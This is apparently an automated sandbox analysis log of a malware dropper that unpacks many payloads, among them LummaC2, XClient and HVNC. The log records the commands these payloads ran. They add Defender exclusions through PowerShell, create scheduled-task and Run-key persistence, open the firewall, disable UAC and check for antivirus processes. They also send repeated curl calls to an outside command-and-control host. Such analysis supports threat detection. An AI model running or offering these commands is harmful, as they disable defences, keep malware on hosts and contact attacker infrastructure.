PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 2212	1232	msedge.exe	91
PID 1232 wrote to memory of 2212	1232	msedge.exe	91
PID 1232 wrote to memory of 4684	1232	msedge.exe	92
PID 1232 wrote to memory of 4684	1232	msedge.exe	92
PID 1232 wrote to memory of 4684	1232	msedge.exe	92
PID 1232 wrote to memory of 4684	1232	msedge.exe	92

System policy modification 1 TTPs 5 IoCs

evasion

Modify Registry

T1112

Processes:

NoEscape.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	NoEscape.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"	NoEscape.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	NoEscape.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1"	NoEscape.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	NoEscape.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid	Process
872	attrib.exe
5552	attrib.exe
4908	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3296
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2908
- - C:\Users\Admin\AppData\Local\Temp\Files\winbox.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\winbox.exe"
    3⤵
    - Executes dropped EXE
    PID:5660
- - C:\Users\Admin\AppData\Local\Temp\Files\foggy-mountains.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\foggy-mountains.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:5932
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:1232
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb209f3cb8,0x7ffb209f3cc8,0x7ffb209f3cd8
        5⤵
        
        PID:2700
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,12234160379996535585,1951678152938939821,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:2
        5⤵
        
        PID:460
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1856,12234160379996535585,1951678152938939821,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2212
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1856,12234160379996535585,1951678152938939821,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2496 /prefetch:8
        5⤵
        
        PID:4684
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,12234160379996535585,1951678152938939821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
        5⤵
        
        PID:3520
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,12234160379996535585,1951678152938939821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
        5⤵
        
        PID:2104
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,12234160379996535585,1951678152938939821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:1
        5⤵
        
        PID:3024
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,12234160379996535585,1951678152938939821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:1
        5⤵
        
        PID:4900
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1856,12234160379996535585,1951678152938939821,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1420
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,12234160379996535585,1951678152938939821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
        5⤵
        
        PID:2044
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,12234160379996535585,1951678152938939821,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
        5⤵
        
        PID:4944
    - - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1856,12234160379996535585,1951678152938939821,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5900 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4460
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,12234160379996535585,1951678152938939821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
        5⤵
        
        PID:5816
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,12234160379996535585,1951678152938939821,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
        5⤵
        
        PID:3740
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,12234160379996535585,1951678152938939821,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5952 /prefetch:2
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5716
- - C:\Users\Admin\AppData\Local\Temp\Files\worker.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\worker.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3332
  - - C:\Users\Admin\AppData\Local\Temp\Files\worker.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\worker.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1396
- - C:\Users\Admin\AppData\Local\Temp\Files\major.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\major.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3572
- - C:\Users\Admin\AppData\Local\Temp\Files\HVNC1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\HVNC1.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\Files\HVNC1.exe' -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5476
- - C:\Users\Admin\AppData\Local\Temp\Files\kp8dnpa9.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\kp8dnpa9.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5148
  - - C:\Users\Admin\AppData\Local\Temp\Files\kp8dnpa9.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\kp8dnpa9.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3744
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 264
      4⤵
      Program crash
      PID:5432
- - C:\Users\Admin\AppData\Local\Temp\Files\m.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\m.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    PID:1964
  - - C:\Windows\sysnldcvmr.exe
      C:\Windows\sysnldcvmr.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5980
    - - C:\Users\Admin\AppData\Local\Temp\1690630277.exe
        
        C:\Users\Admin\AppData\Local\Temp\1690630277.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1088
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:2336
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:3392
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:4064
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:2772
    - - C:\Users\Admin\AppData\Local\Temp\3376418481.exe
        
        C:\Users\Admin\AppData\Local\Temp\3376418481.exe
        5⤵
        Executes dropped EXE
        
        PID:5044
      - C:\Users\Admin\AppData\Local\Temp\2026511412.exe
        
        C:\Users\Admin\AppData\Local\Temp\2026511412.exe
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4188
    - - C:\Users\Admin\AppData\Local\Temp\1078713571.exe
        
        C:\Users\Admin\AppData\Local\Temp\1078713571.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:340
    - - C:\Users\Admin\AppData\Local\Temp\167292389.exe
        
        C:\Users\Admin\AppData\Local\Temp\167292389.exe
        5⤵
        Executes dropped EXE
        
        PID:3700
      - C:\Users\Admin\AppData\Local\Temp\3388728634.exe
        
        C:\Users\Admin\AppData\Local\Temp\3388728634.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4820
- - C:\Users\Admin\AppData\Local\Temp\Files\0b44ippu.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\0b44ippu.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4584
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Treat Treat.bat & Treat.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:2808
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:2928
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        5⤵
        
        PID:1660
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:5936
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5952
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 646751
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1076
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "AffiliateRobotsJoinedNewsletter" Purse
        5⤵
        
        PID:5180
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Suitable + ..\Johnson + ..\July + ..\Firmware + ..\Invalid + ..\Baby + ..\Bar + ..\Continental + ..\Ruled + ..\Gay + ..\Hop + ..\Clearance + ..\Wisdom + ..\January + ..\Denmark + ..\Bull c
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1336
    - - C:\Users\Admin\AppData\Local\Temp\646751\Plates.pif
        
        Plates.pif c
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1488
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\646751\Plates.pif" & rd /s /q "C:\ProgramData\JJKJDAEBFCBK" & exit
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1112
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        7⤵
        Delays execution with timeout.exe
        
        PID:1428
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1872
- - C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    PID:1728
- - C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4428
- - C:\Users\Admin\AppData\Local\Temp\Files\t1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"
    3⤵
    - Executes dropped EXE
    PID:2928
- - C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetWindowsHookEx
    PID:5356
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6104
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Terraria-Multiplayer-Fix-Online.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1872
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Terraria-Multiplayer-Fix-Online" /tr "C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:612
- - C:\Users\Admin\AppData\Local\Temp\Files\evetbeta.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\evetbeta.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4392
- - C:\Users\Admin\AppData\Local\Temp\Files\GIFT-INFO.lMG.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\GIFT-INFO.lMG.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3692
  - - C:\Users\Admin\AppData\Local\Temp\Files\GIFT-INFO.lMG.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\GIFT-INFO.lMG.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      PID:2352
- - C:\Users\Admin\AppData\Local\Temp\Files\random.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:4112
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 1680
      4⤵
      Program crash
      PID:5804
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 1644
      4⤵
      Program crash
      PID:2664
- - C:\Users\Admin\AppData\Local\Temp\Files\postbox.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\postbox.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5432
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      4⤵
      PID:5704
- - C:\Users\Admin\AppData\Local\Temp\Files\aa.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\aa.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1556
- - C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1072
- - C:\Users\Admin\AppData\Local\Temp\Files\zzzz1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\zzzz1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5272
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:3736
- - C:\Users\Admin\AppData\Local\Temp\Files\Server.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Server.exe"
    3⤵
    - Executes dropped EXE
    PID:2528
  - - C:\Users\Admin\AppData\Local\Temp\server.exe
      "C:\Users\Admin\AppData\Local\Temp\server.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:2644
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:6120
- - C:\Users\Admin\AppData\Local\Temp\Files\1_encoded.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\1_encoded.exe"
    3⤵
    - Executes dropped EXE
    PID:3560
- - C:\Users\Admin\AppData\Local\Temp\Files\Client_protected.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Client_protected.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:6032
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1396
      4⤵
      Program crash
      PID:1904
- - C:\Users\Admin\AppData\Local\Temp\Files\ttl.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ttl.exe"
    3⤵
    - Executes dropped EXE
    PID:2620
  - - C:\Users\Admin\AppData\Local\Temp\Files\ttl.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\ttl.exe"
      4⤵
      Executes dropped EXE
      PID:3160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:3812
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:3136
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:2968
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:4468
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:5048
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:6016
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:3876
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:1672
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:3256
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:4544
    - - C:\Windows\system32\cmd.exe
        
